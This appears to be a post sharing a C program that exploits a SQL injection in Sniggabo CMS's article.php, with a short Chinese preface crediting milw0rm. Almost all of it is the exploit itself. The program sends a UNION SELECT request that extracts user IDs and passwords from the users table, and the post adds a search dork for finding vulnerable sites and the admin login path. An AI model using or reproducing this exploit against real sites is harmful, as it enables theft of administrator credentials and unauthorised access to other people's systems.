Sniggabo CMS - Remote SQL Injection Exploit

fuchou-angle

感谢milw0rm的工作人员提供漏洞信息，这个漏洞没有exp，顺手写之。
/*
Sniggabo CMS - Remote SQL Injection Exploit
Date:                11.06.2009
Vulnerability discovered by:    Lidloses_Auge
Admin Panel:             [target]/admin/login.php
Dork:                "powered by Sniggabo CMS" inurl:article.php?id
Code by 2y30r
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <arpa/inet.h>
#include <netdb.h>
char *Http_GET(char *host,int port,char *data)
{
    char response[204800],http_request[2048],*ret;
    struct hostent *get_ip_addr;
    get_ip_addr = gethostbyname(host);
    struct sockaddr_in remote_host;
    remote_host.sin_family = AF_INET;
    remote_host.sin_port = htons(port);
    memcpy(&remote_host.sin_addr.s_addr,get_ip_addr->h_addr_list[0],sizeof(get_ip_addr->h_addr_list[0]));
    int remote_std = socket(AF_INET,SOCK_STREAM,0);
    connect(remote_std,(struct sockaddr*)&remote_host,sizeof(remote_host));
    memset(http_request,'\0',sizeof(http_request));
    sprintf(http_request,"GET %s HTTP/1.1\r\nHost:%s\r\nAccept:*/*\r\n\r\n",data,host);
    send(remote_std,http_request,strlen(http_request),0);
    recv(remote_std,response,sizeof(response),0);
    ret = response;
    return ret;
}
int main(int argc,char *argv[])
{
    if (argc != 2) {
        printf("\t\tSniggabo CMS article.php injection\n\tDork:\"powered by Sniggabo CMS\" inurl:article.php?id\nExploit By 2y30r\nUsage:%s www.target.com/path\n",argv[0]);
        return 0;
    }
    char *response,*tmp,host[256],data[1024];
    memset(host,'\0',sizeof(host));
    char sql[] = "/article.php?Id=-1000+union+select+concat(0x7c7c7c,concat_ws(0x7c,userid,password),0x7c7c7c)+from+users+limit 0,1/*";
    tmp = strstr(argv[1],"/");
    if (!tmp){
        strcpy(host,argv[1]);strcpy(data,sql);
    } else {
        strncpy(host,argv[1],strlen(argv[1]) - strlen(tmp));
        strcpy(data,tmp);strcat(data,sql);
    }
    response = Http_GET(host,80,data);
    printf("%s\n",response);
    return 1;
}